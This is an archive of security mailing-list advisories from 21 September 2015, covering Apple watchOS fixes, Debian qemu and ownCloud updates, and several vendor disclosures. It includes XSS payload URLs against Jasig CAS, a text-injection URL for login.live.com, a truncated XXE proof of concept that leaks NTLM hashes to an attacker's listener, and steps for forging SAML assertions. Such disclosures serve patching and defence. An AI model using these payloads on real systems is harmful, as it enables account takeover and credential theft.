APPLE-SA-2015-09-21-1 watchOS 2

2015-09-21 Thread Apple Product Security 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

APPLE-SA-2015-09-21-1 watchOS 2

watchOS 2 is now available and addresses the following:

Apple Pay
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  Some cards may allow a terminal to retrieve limited recent
transaction information when making a payment
Description:  The transaction log functionality was enabled in
certain configurations. This issue was addressed by removing the
transaction log functionality.
CVE-ID
CVE-2015-5916

Audio
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  Playing a malicious audio file may lead to an unexpected
application termination
Description:  A memory corruption issue existed in the handling of
audio files. This issue issue was addressed through improved memory
handling.
CVE-ID
CVE-2015-5862 : YoungJin Yoon of Information Security Lab. (Adv.:
Prof. Taekyoung Kwon), Yonsei University, Seoul, Korea

Certificate Trust Policy
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  Update to the certificate trust policy
Description:  The certificate trust policy was updated. The complete
list of certificates may be viewed at https://support.apple.com/en-
us/HT204873.

CFNetwork
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  An attacker with a privileged network position may intercept
SSL/TLS connections
Description:  A certificate validation issue existed in NSURL when a
certificate changed. This issue was addressed through improved
certificate validation.
CVE-ID
CVE-2015-5824 : Timothy J. Wood of The Omni Group

CFNetwork
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  Connecting to a malicious web proxy may set malicious
cookies for a website
Description:  An issue existed in the handling of proxy connect
responses. This issue was addressed by removing the set-cookie header
while parsing the connect response.
CVE-ID
CVE-2015-5841 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University

CFNetwork
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  An attacker in a privileged network position can track a
user's activity
Description:  A cross-domain cookie issue existed in the handling of
top level domains. The issue was address through improved
restrictions of cookie creation
CVE-ID
CVE-2015-5885 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University

CFNetwork
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  Malicious FTP servers may be able to cause the client to
perform reconnaissance on other hosts
Description:  An issue existed in FTP clients while checking when
proxy was in use. This issue was resolved through improved
validation.
CVE-ID
CVE-2015-5912 : Amit Klein

CFNetwork
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  A person with physical access to an iOS device may read
cache data from Apple apps
Description:  Cache data was encrypted with a key protected only by
the hardware UID. This issue was addressed by encrypting the cache
data with a key protected by the hardware UID and the user's
passcode.
CVE-ID
CVE-2015-5898 : Andreas Kurtz of NESO Security Labs

CoreCrypto
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  An attacker may be able to determine a private key
Description:  By observing many signing or decryption attempts, an
attacker may have been able to determine the RSA private key. This
issue was addressed using improved encryption algorithms.

CoreText
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  Processing a maliciously crafted font file may lead to
arbitrary code execution
Description:  A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5874 : John Villamil (@day6reak), Yahoo Pentest Team

Data Detectors Engine
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  Processing a maliciously crafted text file may lead to
arbitrary code execution
Description:  Memory corruption issues existed in the processing of
text files. These issues were addressed through improved bounds
checking.
CVE-ID
CVE-2015-5829 : M1x7e1 of Safeye Team (www.safeye.org)

Dev Tools
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  A malicious application may be able to execute arbitrary
code with system privileges
Description:  A memory corruption issue existed in dyld. This was
addressed through improved memory handling.
CVE-ID
CVE-2015-5876 : beist of grayhash

dyld
Available for:  Apple Watch Sport, Apple Watch,
and Apple Watch Edition
Impact:  An application may be able to bypass code signing
Description:  An issue existed with validation of the code signature
of executables. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2015-5839 : @PanguT

Jasig CAS server vulnerabilities

2015-09-21 Thread Antoni Klajn 

Hi,

Jasig CAS server version 4.0.1 is prone to xss vulnerabilities

Timeline:

20.02.2015 - Vendor notified
11.05.2015 - Patches released
21.09.2015 - Bugtraq disclosure

Vulnerable version:

4.0.1

Fixed version:

4.0.2

Vulnerabilities details:


1) XSS in OpenID server


Obtain method:
Paste thi url
https://oauth.example.com/cas/openid/username"[new line]onmouseover="jscode
in OpenID client and try to log in.
space char is not allowed, you can use new line

Example redirection link
https://oauth.example.com/cas/login?openid.assoc_handle=1422619970824-0&openid.ax.mode=fetch_request&openid.ax.required=email&openid.ax.type.email=http%3A%2F%2Fschema.openid.net%2Fcontact%2Femail&openid.identity=https%3A%2F%2Foauth.example.com%2Fcas%2Fopenid%2Fusername%22&openid.mode=checkid_setup&openid.return_to=https%3A%2F%2Fclien.example.com%2Faccount%2Fsignin%2Fcomplete%2F%3Fnext%3D%252F%26janrain_nonce%3D2015-09-21T11%253A15%253A10ZiTDjrd%26openid1_claimed_id%3Dhttps%253A%252F%252Foauth.example.com%252Fcas%252Fopenid%252Fusername%2527&openid.trust_root=https%3A%2F%2Fclient.example.com%2F

Result


2) XSS in OAuth server

Example link
https://oauth.example.com/cas/oauth2.0/authorize?client_id=&redirect_uri="onmouseover=alert(1)%20.trusted-domain.com

Advisory: Insufficient Parameter Sanitization in login.live.com (Microsoft)

2015-09-21 Thread securityresearch 
Original at:
http://securityresearch.shaftek.biz/2015/09/insufficient-parameter-sanitization-login-live-com.html

Overview
Web widgets hosted by Microsoft’s online login portal, login.live.com, do not 
perform sufficient parameter sanitization allowing an attacker to inject 
arbitrary text.

Background
Microsoft offers several legacy Javascript widgets that are used to display and 
customize sign-in link and buttons using Windows Live ID. They are hosted on 
login.live.com at the following URLs:

https://login.live.com/controls/WebAuth.htm
https://login.live.com/controls/WebAuthButton.htm
https://login.live.com/controls/WebAuthLogo.htm

They are documented by Microsoft here and accept several parameters that are 
used to customize the resulting widget.

Details
One of the parameters, style, is used to pass in CSS styling commands for the 
Javascript widgets described above. However, this parameter is not sanitized, 
and reflects back the information passed to to it via Javascript's alert() 
method. It can be coerced to reflect arbitrary text of the attacker’s choosing, 
making it seemingly appear on a legit Microsoft website. While this does not 
result in script execution, it can be used as part of a social engineering 
campaign to attack users.

Example URL with malicious content:

https://login.live.com/controls/WebAuth.htm?appid=test&style=Please_call_Microsoft_Support_at_1-800-BAD-GUYS_and_provide_your_username_and_password:t

References
MSRC Case # 30838 / TRK # 0189016
Microsoft Sign-in Link API: 
https://msdn.microsoft.com/en-us/library/bb676638.aspx

Credits
Thank you to Grier Forensics for providing advice.

Bounty Information
This discovery qualified for a security bounty under the terms of Microsoft's 
Online Services Bug Bounty program.

Timeline
2015-08-06: Vendor notified
2015-08-06: Initial vendor response
2015-08-11: Vendor replicated the issue
2015-08-31: Fix deployed by vendor
2015-09-17: Bounty received 
2015-09-21: Public disclosure

Version Information
Version 2
Last updated on 2015-09-20

CVE-2015-5372 SAML SP Authentication Bypass in nevisAuth

2015-09-21 Thread Antoine Neuenschwander 
#
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#
#
# Product:   nevisAuth [1]
# Vendor:AdNovum [2]
# CVD ID:CVE-2015-5372
# Subject:   Authentication Bypass
# Risk:  Critical
# Effect:Remotely exploitable
# Authors:   Antoine Neuenschwander (antoine.neuenschwan...@csnc.ch)
#Roland Bischofberger (roland.bischofber...@csnc.ch)
# Date:  2015-09-21
#
#

Introduction:
-
nevisAuth implements strong user and system authentication for identity and
access management solutions. It offers secure execution of multi-step
authentication and is able to dynamically adjust authentication strengths.
nevisAuth is highly flexible, easily integrated and supports plug-ins to various
authentication methods. [1]

Security Analysts of Compass Security Schweiz AG [3] discovered a security flaw
in the SAML 2.0 implementation of nevisAuth, which allows an attacker to bypass
the signature validation of security assertions, and therefore impersonate other
users.


Affected:
-
nevisAuth since v4.13.0.0 (2012-11-21)
A security fix was released with version v4.18.3.1 (2015-07-02)


Technical Description:
--
When configured as a SAML 2.0 service provider (SP), nevisAuth authenticates
users based on security assertions issued and signed by a trusted identity
provider (IdP). An assertion contains various fields about the user or subject
being authenticated, e.g. a name identifier (NameID), various attributes and
timestamps. Trust is based on the IdP's certificate, which is used to validate
the digital signature of security assertions.

In a setup where security assertions are conveyed via User-Agent (i.e when using
HTTP POST Binding), it is possible to forge and inject new assertions based on
data intercepted during a valid past authentication process. To achieve this,
the signing certificate is extracted from the assertion and then cloned to
reflect all X.509 data fields. A new public/private key pair is generated. The
public key is inserted into the certificate and the private key is used to sign
it. The signing certificate in the security assertion is now replaced with its
rogue copy. The attacker can then modify arbitrary values of the assertion, for
example the NameID. Finally, the assertion is signed with the cloned
certificate.

Due to a flaw in affected versions of nevisAuth, it is possible to bypass
validation of security assertions by presenting the system with forged
assertions as described above. In consequence, an attacker can impersonate
other users. More details on the attack can be found in [4].


Workaround / Fix:
-
AdNovum released a security fix in nevisAuth v4.18.3.1 (2015-07-02) to address
this issue.

Alternatively, when using HTTP POST Binding, use encrypted security assertions
for transmission via the User-Agent. Or completely avoid transmitting security
assertions over insecure channels by using HTTP Artifact Binding.


Timeline:
-
2015-06-26: Discovered vulnerability
2015-06-30: CVE ID requested
2015-07-01: Initial vendor notification
2015-07-02: Vendor confirmed security issue
2015-07-03: Vendor released security fix & guidance to its customers
2015-07-06: CVE ID assigned
2015-09-21: Public disclosure


Acknowledgements:
-
This vulnerability was discovered using the SAMLRaider Plugin [5] for Burp
Suite [6], developed by Roland Bischofberger (roland.bischofber...@csnc.ch) and
Emanuel Duss (emanuel.d...@gmail.com).


References:
---
[1]: https://www.nevis.ch/en/products/nevisauth-authentication-service.html
[2]: http://www.adnovum.ch/en/
[3]: http://www.csnc.ch/advisories
[4]: 
http://blog.csnc.ch/2015/09/saml-sp-authentication-bypass-vulnerability-in-nevisauth
[5]: https://github.com/SAMLRaider/SAMLRaider
[6]: http://portswigger.net/burp/

SAP Netwaver - XML External Entity Injection

2015-09-21 Thread Lukasz Miedzinski 
Title: SAP Netwaver - XML External Entity Injection
Author: Lukasz Miedzinski
GPG: Public key provided in attachment
Date: 29/10/2014
CVE: CVE-2015-7241

Affected software :
===

SAP Netwear : <7.01

Vendor advisories (only for customers):
===
External ID : 851975 2014
Title:  XML External Entity vulnerability in SAP XML Parser
Security Note: 2098608
Advisory Plan Date: 12/5/2014
Delivery date of fix/Patch Day: 10/2/2014
CVSS Base Score: 5.5
CVSS Base Vector: AV:N/AC:L/AU:S/C:P/I:N/A:P


Description :
=
XML External Entity Injection vulnerability has been found in the XML
parser in the System

Administration->XML Content and Actions -> Import section.


Vulnerabilities :
*

XML External Entity Injection :
==


Example show how pentester is able to get NTLM hash of application's user.

Content of file (PoC) :


 %remote; %param1; ]>


When pentester has metasploit smb_capture module run, then application
will contatc him and provide

NTLM hash of user.


Contact :
=

Lukasz[dot]Miedzinski[at]gmail[dot]com

[SECURITY] [DSA 3363-1] owncloud-client security update

2015-09-21 Thread Luciano Bello 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-3363-1   secur...@debian.org
https://www.debian.org/security/Luciano Bello
September 20, 2015https://www.debian.org/security/faq
- -

Package: owncloud-client
CVE ID : CVE-2015-4456

Johannes Kliemann discovered a vulnerability in ownCloud Desktop Client,
the client-side of the ownCloud file sharing services. The vulnerability
allows man-in-the-middle attacks in situations where the server is using
self-signed certificates and the connection is already established. If
the user in the client side manually distrusts the new certificate, the
file syncing will continue using the malicious server as valid.

For the stable distribution (jessie), this problem has been fixed in
version 1.7.0~beta1+really1.6.4+dfsg-1+deb8u1.

For the testing distribution (stretch), this problem has been fixed
in version 1.8.4+dfsg-1.

For the unstable distribution (sid), this problem has been fixed in
version 1.8.4+dfsg-1.

We recommend that you upgrade your owncloud-client packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCgAGBQJV/ojKAAoJEAVMuPMTQ89EfzUP/3W7wDaOrMi4iux7KJSMk7Sd
ukXkUi71k8nIF/ILqP+SOuTjrqDhq5Yoa6rL6uk86nQbIEHXsMcR0caey4+ObJRC
Emxelx0frZVqoCfXDVKq7wxverZH+15ezAiPhFrpBH/LgGQ9Y+mdO+xGP14q65zP
26ksMs+90h7GxpLw0082pXR/QYu+etvnmFK3D8Z2t9nS9SmC6K9WRNgcCwDoQmpR
INY2NafwmT6nrQzWh+dBOj65DpAt6hneyj/LG0udB3YgLtlabPeQYmvSDfpJhtfE
YugR+B7srNZ8XyV6RQrZDA7Xa5kGrA5NIBU0ht1qaV3FGWHmTV1LZaWXO/qq7WJZ
m1u4QLzeOO/jV3eeeKSLx1VJK07DtBOYmuPtixtJaWUKPAIQN+xsQjxyf3sqoXC6
/Be4RvAqglBQBc/e2ee/iUiO1MW1huTmLoRQkY71XvsrGqLdYxKlyMb0V/sCjn+i
3Sxjaf1h0VSL9geDPwJqWfxBrHhlCJCFsLJZPTXYqIQMtM/Zy8zCuFkSb5qArfY4
ORaw7Brwzd7TQoKdu1Q1tYOBAxoMSlqnocJCKpNTLXaaZvm7Nwh4ea+yle+rPa8P
gJnIaDIXrYIgCN0+2fYD4aPti/my+4xqDwfO3IwdVCJVKC5ssNm1yaA4yhTr0urv
KPZqG7c5yc38EJJfbels
=BRV5
-END PGP SIGNATURE-

Defense in depth -- the Microsoft way (part 35): Windows Explorer ignores "Run as administrator" ...

2015-09-21 Thread Stefan Kanthak 
Hi @ll,

since Microsoft introduced the security theatre named "user account
control" with Windows Vista users cant start (another instance of)
the Windows Explorer with elevated rights any more: the "Run as
administrator" and the "Run as different user" context menu entries
only start another instance of Windows Explorer with but the
credentials of the logged on (interactive) user.

No, neither starting Windows Explorer per "Explorer.Exe /Separate"
nor setting the following registry entries overcomes this limitation:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"DesktopProcess"=dword:01

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"SeparateProcess"=dword:01


Microsoft is well aware of this, but still doesnt remove or disable
these dysfunctional context menu entries for Explorer.exe, although
their own user experience interface guidelines request that (context)
menu entries which are not applicable must not be shown or have to be
disabled!

See :

| Disable menu items that don't apply to the current context
...
| Remove rather than disable context menu items that don't
| apply to the current context.

or 

If you want to get rid of "Run as administrator" and "Run as
different user" for Explorer.exe to save yourself, your users and
your support/helpdesk from confusion or frustration add the following
registry entries:

[HKEY_CLASSES_ROOT\exefile\Shell\RunAs]
"AppliesTo"="System.FileName:<>Explorer.Exe"

[HKEY_CLASSES_ROOT\exefile\Shell\RunAsUser]
"AppliesTo"="System.FileName:<>Explorer.Exe"

See 
and 
to understand how and why this registry entry works.

JFTR: the context menu entry "Run as administrator" doesnt work at
  all in standard user accounts when UAC is set to "never elevate".
  This is another clear violation of Microsofts own UX guidelines!

stay tuned
Stefan Kanthak

PS: the script  adds
this and several other missing registry entries which enable
"Run as administrator" and "Run as different user" for quite some
file types.

[SECURITY] [DSA 3362-1] qemu-kvm security update

2015-09-21 Thread Salvatore Bonaccorso 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-3362-1   secur...@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
September 18, 2015https://www.debian.org/security/faq
- -

Package: qemu-kvm
CVE ID : CVE-2015-5278 CVE-2015-5279 CVE-2015-6815 CVE-2015-6855

Several vulnerabilities were discovered in qemu-kvm, a full
virtualization solution on x86 hardware.

CVE-2015-5278

Qinghao Tang of QIHU 360 Inc. discovered an infinite loop issue in
the NE2000 NIC emulation. A privileged guest user could use this
flaw to mount a denial of service (QEMU process crash).

CVE-2015-5279

Qinghao Tang of QIHU 360 Inc. discovered a heap buffer overflow flaw
in the NE2000 NIC emulation. A privileged guest user could use this
flaw to mount a denial of service (QEMU process crash), or
potentially to execute arbitrary code on the host with the
privileges of the hosting QEMU process.

CVE-2015-6815

Qinghao Tang of QIHU 360 Inc. discovered an infinite loop issue in
the e1000 NIC emulation. A privileged guest user could use this flaw
to mount a denial of service (QEMU process crash).

CVE-2015-6855

Qinghao Tang of QIHU 360 Inc. discovered a flaw in the IDE
subsystem in QEMU occurring while executing IDE's
WIN_READ_NATIVE_MAX command to determine the maximum size of a
drive. A privileged guest user could use this flaw to mount a
denial of service (QEMU process crash).

For the oldstable distribution (wheezy), these problems have been fixed
in version 1.1.2+dfsg-6+deb7u11.

We recommend that you upgrade your qemu-kvm packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCgAGBQJV/G8LAAoJEAVMuPMTQ89EBW0P/R+Gc/di08JOEyai7DregXfn
NDss2LyL4xI2v5VVEhgCYpY3WA8DOi2bc3UqgmzMAEwAhpUTkhtc2NX1wQU/rba1
Lf44lBPPuUKP/nYcz1CSn0xQHTGla7R0qpgYetdLDwSiN4rnHIDreSpSVWXh4R3H
NrAf5pIRPmnOGRuNkx907ptZ9SD26we1fcpZaKv43kjnmlmrul1OEgYdrbXw+qQc
xT36dZSSxq3bfpiKQFAWwNt/Jp+2CaNysVJyBIGM2PZ1H33IQtwcr0ub06sZOQIU
btOgVmICIMXtZF0/OcxusOkS8t097tBM/v+f+WrwG17Y46QomD0gK0f2tYq5MW8U
PbWmZem0Lkv+EThTDCay1DR060YhUmaKHG6PHgJMRSAzGK9ElMxHNuJUdjwJQjgI
cvfJK0Z6GGhx3x+1BOMNwU877JLlFJhkPVN2CpP8NYNxT0Sk5ripvioUI11p2ZjC
IiOgitLApZmI9IQ9AZWulriNf5sMIZyAgyVfebZ1vIjd8M/XQiTdmGkAFgGDodni
DNdY4x8/efFRTqfaKC0XnE5m8LO1qX1YwyaCBIM9Ky+e6k2HpbEbrqPdx+HXr+WN
WkytBnj7REnQMK0JDC/iU5SvlqVj8OOwKyyEVmtF9rtZIbWWKdE64FKuWhTZPpGB
r7Q3etxkoWtKMowCVOrA
=c8Zw
-END PGP SIGNATURE-

[SECURITY] [DSA 3361-1] qemu security update

2015-09-21 Thread Salvatore Bonaccorso 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-3361-1   secur...@debian.org
https://www.debian.org/security/ Salvatore Bonaccorso
September 18, 2015https://www.debian.org/security/faq
- -

Package: qemu
CVE ID : CVE-2015-5278 CVE-2015-5279 CVE-2015-6815 CVE-2015-6855
Debian Bug : 798101 799073 799074

Several vulnerabilities were discovered in qemu, a fast processor
emulator.

CVE-2015-5278

Qinghao Tang of QIHU 360 Inc. discovered an infinite loop issue in
the NE2000 NIC emulation. A privileged guest user could use this
flaw to mount a denial of service (QEMU process crash).

CVE-2015-5279

Qinghao Tang of QIHU 360 Inc. discovered a heap buffer overflow flaw
in the NE2000 NIC emulation. A privileged guest user could use this
flaw to mount a denial of service (QEMU process crash), or
potentially to execute arbitrary code on the host with the
privileges of the hosting QEMU process.

CVE-2015-6815

Qinghao Tang of QIHU 360 Inc. discovered an infinite loop issue in
the e1000 NIC emulation. A privileged guest user could use this flaw
to mount a denial of service (QEMU process crash).

CVE-2015-6855

Qinghao Tang of QIHU 360 Inc. discovered a flaw in the IDE
subsystem in QEMU occurring while executing IDE's
WIN_READ_NATIVE_MAX command to determine the maximum size of a
drive. A privileged guest user could use this flaw to mount a
denial of service (QEMU process crash).

For the oldstable distribution (wheezy), these problems have been fixed
in version 1.1.2+dfsg-6a+deb7u11.

For the stable distribution (jessie), these problems have been fixed in
version 1:2.1+dfsg-12+deb8u4.

For the testing distribution (stretch), these problems have been fixed
in version 1:2.4+dfsg-3 or earlier.

For the unstable distribution (sid), these problems have been fixed in
version 1:2.4+dfsg-3 or earlier.

We recommend that you upgrade your qemu packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBCgAGBQJV/G8AAAoJEAVMuPMTQ89EUy8P+gOnG8kS8F8Ns74XfK5u15p1
TwjsPvTR2tYzhhMrpe2a0JchL56ckjIKpcl3Ei7BDXOhDJ98PP8jBE2fJVYNHjkV
+cAkq2PJSb2kQU+F8Vu7y4UfImqLBgFZy8yNNfBOm4xYrSPON6Qg/FA+3wtUzMZy
FaNt5RbXjhpA/9FTTxu5iLpZ2M47QHfSXhdKRheffmMu0qYqG884i94YpHGiZqMK
vvxj1XJWJngtiU4e+koIF04mmKmx6bt8G+zob3mtzHp3BTBCXWx46W6TasbrdlTL
HDZO+x7Gh1Qmdivd1nhmWhQ+PzlsreJI3vXt27BvhgHvDIARhTk552qMU1pTC1Tc
DEup7AGX+vdMVogHsARuaDELq9qakSLhFv/4WwVkjKce7I6YiCwxDsYQ5LgbSwK7
C8aCt+tBsLRDqyutPj4vUd2yL8ttfyUQiQIQ6Prsy0ipgQ/rFWJVYdF+93qMqdaF
27Zy78YUq9rvja402znoK1YA+VT77c9cZ5nyYt42qXID9o2o+y95KgAunZu/Bu7K
chrbvwjkOvY5d2EiAUTeKj25m/YlounwlBUd2DJ7oDz4vVypAjZ2ivkBvbi6Ul1q
iKKAa36E24BZvvd8WKHZxdt1Ozz6UBDwPjvzOxwRc1R5EA+Xrv+uw1vbL+/A5/pK
WtWJPzBssz1iIXWmMgJg
=SSFZ
-END PGP SIGNATURE-